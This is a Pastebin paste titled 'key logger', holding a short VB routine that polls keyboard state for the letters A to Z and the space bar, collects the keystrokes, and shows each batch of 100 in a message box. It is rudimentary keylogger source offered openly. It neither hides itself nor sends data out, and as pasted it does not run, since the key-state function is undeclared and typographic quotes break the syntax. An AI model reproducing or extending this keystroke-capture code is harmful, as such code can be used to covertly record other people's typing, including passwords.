jhylands

key logger

Jan 29th, 2012
263
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 0.38 KB | None | 0 0
  1. Private Sub tmrTimer_Timer()
  2. Dim i As Integer
  3. Static data As String
  4. For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’
  5. If GAKS(i)<>0 Then data = data & Chr(i)
  6. Next i
  7. If GAKS(32) <> 0 Then data = data & ” ” ‘checking for the space bar
  8. If Len(data)>=100 Then
  9. Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data
  10. data = “”
  11. End If
  12. End Sub
Advertisement
Add Comment
Please, Sign In to add comment